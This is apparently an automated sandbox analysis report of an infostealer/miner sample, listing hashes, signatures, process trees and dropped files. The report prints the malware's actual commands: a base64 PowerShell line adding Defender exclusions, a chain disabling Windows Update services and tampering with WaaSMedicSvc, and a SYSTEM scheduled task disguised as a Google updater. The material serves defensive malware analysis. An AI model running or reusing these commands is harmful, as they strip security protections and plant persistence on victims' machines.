Analysis
-
max time kernel: 99s
max time network: 47s
platform: windows7_x64
resource: win7-20220414-en
submitted: 13-05-2022 17:44
Static task: static1
Behavioral task: behavioral1
  Sample: gayporn.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: gayporn.exe
  Resource: win10v2004-20220414-en
General
Target: gayporn.exe
Size: 185KB
MD5: dc73d106133d7f4652a22a2ba5838bab
SHA1: 1a24617b06b8c7a694ee6fef57d454ba9dad72fb
SHA256: 219f75d798f48a66a7643cacca827cd6d9fbf72af8dfaa05b88cb0538a7864f7
SHA512: 39f6cf4c0d3c27bd690846ee6893e12ef6d6e13e6b975cf65c69f786fda2baa4c17e681b9f5fc5da9a21e7a5a7214f9c4393b344828104234bbf9d1d022b8c4a
Malware Config
Signatures
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
pid   process
452   369661.exe
2016  updater.exe
-
Possible privilege escalation attempt 2 IoCs
Processes:
pid   process
1660  takeown.exe
624   icacls.exe
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 11 IoCs
Processes:
pid   process
1928  gayporn.exe (10 entries)
2012  cmd.exe
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
pid   process
1660  takeown.exe
624   icacls.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
9     freegeoip.app
10    freegeoip.app
-
Drops file in System32 directory 1 IoCs
Processes:
description: File opened for modification
ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
process: powershell.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description        ioc                                                                         process
Key opened         \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0             gayporn.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  gayporn.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies system certificate store
Processes:
gayporn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c43937
4b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 gayporn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 
0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb64
63609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value removed as a duplicate] gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob value removed as a duplicate] gayporn.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid   process
1212  powershell.exe
1896  conhost.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
description                 pid   process
Token: SeDebugPrivilege     1928  gayporn.exe
Token: SeDebugPrivilege     1212  powershell.exe
Token: SeShutdownPrivilege  2012  powercfg.exe
Token: SeDebugPrivilege     1896  conhost.exe
Token: SeShutdownPrivilege  2016  powercfg.exe
Token: SeShutdownPrivilege  476   powercfg.exe
Token: SeShutdownPrivilege  1068  powercfg.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
(64 entries; identical consecutive rows are collapsed, with the repetition count in the last column)
pid   process      target pid  target process  events
1928  gayporn.exe  452         369661.exe      4
452   369661.exe   1896        conhost.exe     4
1896  conhost.exe  428         cmd.exe         3
428   cmd.exe      1212        powershell.exe  3
1896  conhost.exe  1736        cmd.exe         3
1896  conhost.exe  2028        cmd.exe         3
1736  cmd.exe      548         sc.exe          3
1736  cmd.exe      1580        sc.exe          3
1736  cmd.exe      1596        sc.exe          3
2028  cmd.exe      2012        powercfg.exe    3
1736  cmd.exe      1692        sc.exe          3
1736  cmd.exe      752         sc.exe          3
1736  cmd.exe      2024        sc.exe          3
2028  cmd.exe      2016        powercfg.exe    3
2028  cmd.exe      476         powercfg.exe    3
2028  cmd.exe      1068        powercfg.exe    3
1736  cmd.exe      1312        sc.exe          3
1896  conhost.exe  776         cmd.exe         3
776   cmd.exe      1512        schtasks.exe    3
1736  cmd.exe      1372        sc.exe          3
1736  cmd.exe      1620        sc.exe          2
Processes
(process tree; the bracketed number is the depth in the tree)
[1] C:\Users\Admin\AppData\Local\Temp\gayporn.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\gayporn.exe"
    - Loads dropped DLL
    - Checks processor information in registry
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\369661.exe
      command line: "C:\Users\Admin\AppData\Local\369661.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\369661.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
            (the -EncodedCommand value is UTF-16LE base64; it decodes to: <#qy#> Add-MpPreference <#txa#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#rs#> -Force <#bzhb#>, i.e. a Microsoft Defender exclusion for the whole user profile and system drive, padded with empty block comments)
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\sc.exe
            command line: sc stop wuauserv
        [5] C:\Windows\system32\sc.exe
            command line: sc stop bits
        [5] C:\Windows\system32\sc.exe
            command line: sc stop dosvc
        [5] C:\Windows\system32\sc.exe
            command line: sc stop UsoSvc
        [5] C:\Windows\system32\sc.exe
            command line: sc stop WaaSMedicSvc
        [5] C:\Windows\system32\sc.exe
            command line: sc config wuauserv start= disabled
        [5] C:\Windows\system32\sc.exe
            command line: sc failure wuauserv reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            command line: sc config bits start= disabled
        [5] C:\Windows\system32\sc.exe
            command line: sc failure bits reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            command line: sc config dosvc start= disabled
        [5] C:\Windows\system32\sc.exe
            command line: sc failure dosvc reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            command line: sc config UsoSvc start= disabled
        [5] C:\Windows\system32\sc.exe
            command line: sc failure UsoSvc reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            command line: sc config wuauserv start= disabled
        [5] C:\Windows\system32\sc.exe
            command line: sc failure wuauserv reset= 0 actions= ""
        [5] C:\Windows\system32\takeown.exe
            command line: takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe
            command line: icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\reg.exe
            command line: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        [5] C:\Windows\system32\reg.exe
            command line: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        [5] C:\Windows\system32\reg.exe
            command line: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        [5] C:\Windows\system32\reg.exe
            command line: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        [5] C:\Windows\system32\reg.exe
            command line: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        [5] C:\Windows\system32\reg.exe
            command line: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        [5] C:\Windows\system32\schtasks.exe
            command line: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            command line: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            command line: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            command line: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            command line: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            command line: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            command line: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
      [4] C:\Windows\System32\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\powercfg.exe
            command line: powercfg /x -hibernate-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe
            command line: powercfg /x -hibernate-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe
            command line: powercfg /x -standby-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe
            command line: powercfg /x -standby-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
            command line: C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
            - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\369661.exe
  Filesize: 4.2MB
  MD5: 8268ff95b3aaea6d6de8f02a73c323d2
  SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
  SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
  SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
- C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
  Filesize: 4.2MB
  MD5: 8268ff95b3aaea6d6de8f02a73c323d2
  SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
  SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
  SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
- \Users\Admin\AppData\Local\369661.exe
  Filesize: 4.2MB
  MD5: 8268ff95b3aaea6d6de8f02a73c323d2
  SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
  SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
  SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
- \Users\Admin\AppData\Local\Temp\DotNetZip.dll
  Filesize: 461KB
  MD5: a999d7f3807564cc816c16f862a60bbe
  SHA1: 1ee724daaf70c6b0083bf589674b6f6d8427544f
  SHA256: 8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
  SHA512: 6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
- \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
  Filesize: 685KB
  MD5: 081d9558bbb7adce142da153b2d5577a
  SHA1: 7d0ad03fbda1c24f883116b940717e596073ae96
  SHA256: b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
  SHA512: 2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
- \Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
  Filesize: 384KB
  MD5: 55c797383dbbbfe93c0fe3215b99b8ec
  SHA1: 1b089157f3d8ae64c62ea15cdad3d82eafa1df4b
  SHA256: 5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
  SHA512: 648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
- \Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
  Filesize: 1.3MB
  MD5: 8be215abf1f36aa3d23555a671e7e3be
  SHA1: 547d59580b7843f90aaca238012a8a0c886330e6
  SHA256: 83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
  SHA512: 38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b
- \Users\Admin\AppData\Roaming\Chrome\updater.exe
  Filesize: 4.2MB
  MD5: 8268ff95b3aaea6d6de8f02a73c323d2
  SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
  SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
  SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
Memory dumps
- memory/112-102-0x0000000000000000-mapping.dmp
- memory/428-77-0x0000000000000000-mapping.dmp
- memory/452-71-0x0000000000000000-mapping.dmp
- memory/476-94-0x0000000000000000-mapping.dmp
- memory/548-86-0x0000000000000000-mapping.dmp
- memory/548-118-0x0000000000000000-mapping.dmp
- memory/624-108-0x0000000000000000-mapping.dmp
- memory/752-91-0x0000000000000000-mapping.dmp
- memory/768-101-0x0000000000000000-mapping.dmp
- memory/776-97-0x0000000000000000-mapping.dmp
- memory/988-116-0x0000000000000000-mapping.dmp
- memory/1020-114-0x0000000000000000-mapping.dmp
- memory/1068-95-0x0000000000000000-mapping.dmp
- memory/1132-109-0x0000000000000000-mapping.dmp
- memory/1212-80-0x000007FEEDEB0000-0x000007FEEE8D3000-memory.dmp (Filesize: 10.1MB)
- memory/1212-83-0x000000000259B000-0x00000000025BA000-memory.dmp (Filesize: 124KB)
- memory/1212-81-0x000007FEED350000-0x000007FEEDEAD000-memory.dmp (Filesize: 11.4MB)
- memory/1212-82-0x0000000002594000-0x0000000002597000-memory.dmp (Filesize: 12KB)
- memory/1212-78-0x0000000000000000-mapping.dmp
- memory/1312-96-0x0000000000000000-mapping.dmp
- memory/1372-99-0x0000000000000000-mapping.dmp
- memory/1480-104-0x0000000000000000-mapping.dmp
- memory/1484-113-0x0000000000000000-mapping.dmp
- memory/1488-103-0x0000000000000000-mapping.dmp
- memory/1508-105-0x0000000000000000-mapping.dmp
- memory/1512-98-0x0000000000000000-mapping.dmp
- memory/1580-87-0x0000000000000000-mapping.dmp
- memory/1580-119-0x0000000000000000-mapping.dmp
- memory/1596-88-0x0000000000000000-mapping.dmp
- memory/1620-100-0x0000000000000000-mapping.dmp
- memory/1660-107-0x0000000000000000-mapping.dmp
- memory/1692-90-0x0000000000000000-mapping.dmp
- memory/1692-121-0x0000000000000000-mapping.dmp
- memory/1736-84-0x0000000000000000-mapping.dmp
- memory/1756-120-0x0000000000000000-mapping.dmp
- memory/1808-112-0x0000000000000000-mapping.dmp
- memory/1828-115-0x0000000000000000-mapping.dmp
- memory/1856-106-0x0000000000000000-mapping.dmp
- memory/1884-110-0x0000000000000000-mapping.dmp
- memory/1892-111-0x0000000000000000-mapping.dmp
- memory/1896-74-0x0000000000190000-0x00000000005CE000-memory.dmp (Filesize: 4.2MB)
- memory/1896-75-0x000000001B650000-0x000000001BA70000-memory.dmp (Filesize: 4.1MB)
- memory/1896-73-0x000000001BA90000-0x000000001BECE000-memory.dmp (Filesize: 4.2MB)
- memory/1896-76-0x000007FEFBA91000-0x000007FEFBA93000-memory.dmp (Filesize: 8KB)
- memory/1928-64-0x000000000A800000-0x000000000A862000-memory.dmp (Filesize: 392KB)
- memory/1928-59-0x000000000AA40000-0x000000000AAF0000-memory.dmp (Filesize: 704KB)
- memory/1928-55-0x00000000003A0000-0x00000000003A6000-memory.dmp (Filesize: 24KB)
- memory/1928-66-0x00000000006E0000-0x0000000000700000-memory.dmp (Filesize: 128KB)
- memory/1928-54-0x0000000000830000-0x0000000000868000-memory.dmp (Filesize: 224KB)
- memory/1928-56-0x0000000074E91000-0x0000000074E93000-memory.dmp (Filesize: 8KB)
- memory/1928-69-0x000000000B180000-0x000000000B1FA000-memory.dmp (Filesize: 488KB)
- memory/1996-117-0x0000000000000000-mapping.dmp
- memory/2012-123-0x0000000000000000-mapping.dmp
- memory/2012-89-0x0000000000000000-mapping.dmp
- memory/2016-93-0x0000000000000000-mapping.dmp
- memory/2016-125-0x0000000000000000-mapping.dmp
- memory/2024-92-0x0000000000000000-mapping.dmp
- memory/2028-85-0x0000000000000000-mapping.dmp